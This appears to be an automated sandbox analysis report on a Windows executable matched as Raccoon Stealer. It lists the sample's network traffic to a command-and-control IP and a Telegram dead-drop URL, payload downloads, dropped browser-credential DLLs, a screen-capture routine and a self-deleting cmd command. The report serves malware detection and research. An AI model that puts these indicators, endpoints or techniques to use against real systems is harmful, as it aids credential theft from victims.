d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8

Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150

Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327260135.0000000002DB2000.00000004.00000001.sdmp	String found in binary or memory: http://185.138.164.150/
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323065453.0000000002DB2000.00000004.00000001.sdmp	String found in binary or memory: http://185.138.164.150/;r
Source: softokn3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: softokn3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: nssckbi.dll.1.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: softokn3.dll.1.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: softokn3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: softokn3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: nssckbi.dll.1.dr	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://ocsp.accv.es0
Source: softokn3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: softokn3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: softokn3.dll.1.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://policy.camerfirma.com0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://repository.swisssign.com/0
Source: softokn3.dll.1.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: softokn3.dll.1.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: softokn3.dll.1.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: nssckbi.dll.1.dr	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: nssckbi.dll.1.dr	String found in binary or memory: http://www.accv.es00
Source: nssckbi.dll.1.dr	String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: nssckbi.dll.1.dr	String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://www.chambersign.org1
Source: nssckbi.dll.1.dr	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: mozglue.dll.1.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: softokn3.dll.1.dr	String found in binary or memory: http://www.mozilla.com0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: nssckbi.dll.1.dr	String found in binary or memory: http://www.quovadis.bm0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: sqlite3.dll.1.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: nssckbi.dll.1.dr	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: nssckbi.dll.1.dr	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: nssckbi.dll.1.dr	String found in binary or memory: https://repository.luxtrust.lu0
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.305167317.0000000002D36000.00000004.00000001.sdmp, SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327229599.0000000002D2C000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.305167317.0000000002D36000.00000004.00000001.sdmp, SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327229599.0000000002D2C000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp	String found in binary or memory: https://t.me/agrybirdsgamerept
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp	String found in binary or memory: https://telegram.org/img/t_logo.png
Source: nssckbi.dll.1.dr	String found in binary or memory: https://www.catcert.net/verarrel
Source: nssckbi.dll.1.dr	String found in binary or memory: https://www.catcert.net/verarrel05
Source: softokn3.dll.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323052701.0000000002DA0000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0:
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323052701.0000000002DA0000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0th
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323052701.0000000002DA0000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0de
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 185.138.164.150

Source: unknown

DNS traffic detected: queries for: t.me

Source: global traffic	HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
Source: global traffic	HTTP traffic detected: GET //l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: global traffic	HTTP traffic detected: GET //l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49744 version: TLS 1.2

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Code function: 1_2_0042C157 __EH_prolog,GdiplusStartup,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,_mbstowcs,GdipSaveImageToFile,DeleteObject,GdiplusShutdown,

E-Banking Fraud:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.326614932.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.297061443.0000000002200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe PID: 7124, type: MEMORYSTR

Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0040E139
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0043E2E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0042A2F9
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0043628C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0042C383
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_00410648
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_004206DD
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0040CF54
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_004210B1
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0040F2E6
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_004373C6
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0040D684
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_00437819
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0041FD36
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0040BF59
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0041E014
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0042E110
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0044A480
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0045A4BD
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_004484BA
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0045A5DD
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0046475B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_004187EC
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0041E857
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0041EBE9
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_00422D2B

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: String function: 0044F0F9 appears 41 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: String function: 00467790 appears 100 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: String function: 00440940 appears 35 times

Source: api-ms-win-core-handle-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found

Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.328077326.000000006E63B000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamenss3.dll8 vs SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323091495.0000000002DC9000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327485031.000000006E502000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll8 vs SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: sqlite3.dll.1.dr

Static PE information: Number of sections : 18 > 10

Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Virustotal: Detection: 33%
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	ReversingLabs: Detection: 37%

Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

File created: C:\Users\user\AppData\LocalLow\sqlite3.dll

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/67@1/2

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Code function: 1_2_0042A224 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree,

Source: softokn3.dll.1.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, sqlite3.dll.1.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, sqlite3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
